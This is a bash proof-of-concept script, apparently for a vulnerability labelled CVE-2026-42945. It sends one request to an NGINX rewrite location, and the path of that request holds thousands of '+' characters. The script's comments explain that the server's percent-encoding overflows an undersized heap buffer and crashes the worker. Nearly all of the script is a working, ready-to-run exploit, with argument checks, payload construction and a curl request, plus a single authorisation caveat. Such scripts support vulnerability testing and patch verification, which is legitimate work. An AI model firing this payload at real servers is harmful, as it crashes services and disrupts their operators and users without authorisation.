#!/usr/bin/env bash
# Single-request heap-buffer-overflow trigger for CVE-2026-42945.
# Sends GET /api/<N '+' bytes> to the vulnerable NGINX rewrite location.
# The unnamed capture $1 (all '+') is percent-encoded (+ -> %2B, 1->3 bytes)
# by ngx_escape_uri(NGX_ESCAPE_ARGS) into an undersized heap buffer,
# overflowing the NGINX worker heap and faulting the worker.
#
# Usage: run.sh <base_url> <count>
#   base_url : e.g. http://127.0.0.1:19321
#   count    : number of '+' bytes in the capture (e.g. 8000)
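set -u

# Positional arguments (see the usage block above). Both are required; the
# ':?' expansion aborts with the given message when either is missing.
BASE_URL="${1:?base_url required}"
COUNT="${2:?count required}"

# The target must be an absolute http(s) URL: it is spliced straight into the
# curl command line, so a value starting with '-' would be parsed by curl as an
# option rather than as the URL.
if [[ "$BASE_URL" != http://* && "$BASE_URL" != https://* ]]; then
    printf '[!] base_url must start with http:// or https://, got %q\n' "$BASE_URL" >&2
    exit 2
fi

# COUNT must be a positive decimal integer: it becomes the printf field width
# below, and a non-numeric value would otherwise surface as an opaque printf
# error instead of a usage error.
if [[ ! "$COUNT" =~ ^[1-9][0-9]*$ ]]; then
    printf '[!] count must be a positive integer, got %q\n' "$COUNT" >&2
    exit 2
fi

# Build a path of COUNT literal '+' characters (raw, unencoded on the wire).
# '%*s' pads the empty string with COUNT spaces; swapping each space for '+'
# gives the payload without spawning seq or building an argument list that
# grows with COUNT (the original seq-based form would hit ARG_MAX for large
# counts).
printf -v PAYLOAD '%*s' "$COUNT" ''
PAYLOAD="${PAYLOAD// /+}"

echo "[*] Target:  ${BASE_URL}/api/<${COUNT} '+'>"
echo "[*] Sending single crafted request..."

# --path-as-is stops curl from collapsing '/./' and '/../' segments in the
# path; it does not affect '+', which curl never percent-encodes, so the
# characters reach the server as literal bytes and any encoding happens
# server-side.
# --max-time bounds the wait: a worker that faults mid-request may leave the
# connection open with no reply, and the trigger would otherwise hang.
# Override the default with CURL_MAX_TIME=<seconds> in the environment.
# A worker crash typically manifests as an empty reply / reset (curl exit 52
# or 56); we print curl's exit code rather than interpreting success.
# This request is intended to crash a server process — only point it at a
# target you are authorised to test.
curl -sS --path-as-is --max-time "${CURL_MAX_TIME:-10}" -o /dev/null \
    -w "[*] http_code=%{http_code} curl_exit_pending\n" \
    "${BASE_URL}/api/${PAYLOAD}"
rc=$?
echo "[*] curl exit code: ${rc}"
# Always exit 0: the outcome is reported via the printed http_code and curl
# exit code, not via this script's status, so wrappers that loop over counts
# are not stopped by a (expected) failed request.
exit 0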
